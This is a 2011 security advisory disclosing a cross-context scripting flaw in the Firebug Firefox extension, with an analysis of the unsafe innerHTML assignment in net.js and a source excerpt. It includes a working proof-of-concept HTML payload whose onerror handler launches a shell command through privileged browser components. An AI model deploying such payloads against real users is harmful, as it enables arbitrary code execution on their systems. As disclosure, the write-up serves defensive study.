http://www.80vul.com/firefox/Firebug%20Firefox%20Extension%20Cross%20Context%20Scripting%20Vulnerability.htm *Firebug Firefox Extension Cross Context Scripting Vulnerability* Author: www.80vul.com [Email:5up3rh3i#gmail.com] 2011/06/18 - Public Disclosure *Description* 80vul.com discovered firebug that a famous firefox extension is vulnerable to Cross Context Scripting, and this vul can execute evil codz in the chrome privileged Firefox zone.so successful exploitation allows execution of arbitrary code in user�s system. *Exploitation* a demo : http://www.80vul.com/firefox/firebug0day.htm <html> <head>firebug 0day</head> <body> <img src=2 onerror='var file = Components.classes["@mozilla.org/file/local;1 "].createInstance(Components.interfaces.nsILocalFile);file.initWithPath ("/bin/sh");var process =Components.classes["@mozilla.org/process/util;1"]. createInstance(Components.interfaces.nsIProcess);process.init(file);var args= ["-c", " gcalctool"];process.run(false, args, args.length);'></img> </body> </html> Open the firebug, and visite the exploit's URL, then open "NET" -->URL-->"HTML" , and gcalctool is executed. *Analysis* extract the code from firebug@software.joehewitt.com.xpi by rar or zip . then let�s go ... 80vul@ubuntu:~$ grep -in 'body.innerHTML' -r ./ firebug@software.joehewitt.com/ --colour ./firebug@software.joehewitt.com/content/firebug/traceModule.js:1128: iframe.contentWindow.document.body.innerHTML = text; ./firebug@software.joehewitt.com/content/firebug/net.js:2561: iframe.contentWindow.document.body.innerHTML = text; 80vul@ubuntu:~$ grep -in 'body.innerHTML' -r ./ firebug@software.joehewitt.com/content/firebug/net.js --colour -8 2553- } 2554- 2555- if (hasClass(tab, "netInfoHtmlTab") && file.loaded && ! netInfoBox.htmlPresented) 2556- { 2557- netInfoBox.htmlPresented = true; 2558- 2559- var text = Utils.getResponseText(file, context); 2560- var iframe = netInfoBox.getElementsByClassName(" netInfoHtmlPreview").item(0); 2561: iframe.contentWindow.document.body.innerHTML = text; 2562- } 2563- 2564- // Notify listeners about update so, content of custom tabs can be updated. 2565- dispatch(NetInfoBody.fbListeners, "updateTabBody", [netInfoBox, file, context]); 2566- }, 2567- 2568- setResponseText: function(file, netInfoBox, responseTextBox, context) 2569- { edit the content/firebug/net.js and seach "netInfoHtmlTab": 80vul@ubuntu:~$ gedit ./ firebug@software.joehewitt.com/content/firebug/net.js Firebug.NetMonitor.NetInfoBody = domplate(Firebug.Rep, new Firebug.Listener (), { tag: DIV({"class": "netInfoBody", _repObject: "$file"}, TAG("$infoTabs", {file: "$file"}), TAG("$infoBodies", {file: "$file"}) ), infoTabs: DIV({"class": "netInfoTabs focusRow subFocusRow", "role": "tablist "}, A({"class": "netInfoParamsTab netInfoTab a11yFocus", onclick: "$ onClickTab", "role": "tab", view: "Params", $collapsed: "$file|hideParams"}, $STR("URLParameters") ), A({"class": "netInfoHeadersTab netInfoTab a11yFocus", onclick: "$onClickTab", "role": "tab", view: "Headers"}, $STR("Headers") ), A({"class": "netInfoPostTab netInfoTab a11yFocus", onclick: "$ onClickTab", "role": "tab", view: "Post", $collapsed: "$file|hidePost"}, $STR("Post") ), A({"class": "netInfoPutTab netInfoTab a11yFocus", onclick: "$ onClickTab", "role": "tab", view: "Put", $collapsed: "$file|hidePut"}, $STR("Put") ), A({"class": "netInfoResponseTab netInfoTab a11yFocus", onclick: "$onClickTab", "role": "tab", view: "Response", $collapsed: "$file|hideResponse"}, $STR("Response") ), A({"class": "netInfoCacheTab netInfoTab a11yFocus", onclick: "$ onClickTab", "role": "tab", view: "Cache", $collapsed: "$file|hideCache"}, $STR("Cache") ), A({"class": "netInfoHtmlTab netInfoTab a11yFocus", onclick: "$ onClickTab", "role": "tab", view: "Html", $collapsed: "$file|hideHtml"}, $STR("HTML") ) ), hitest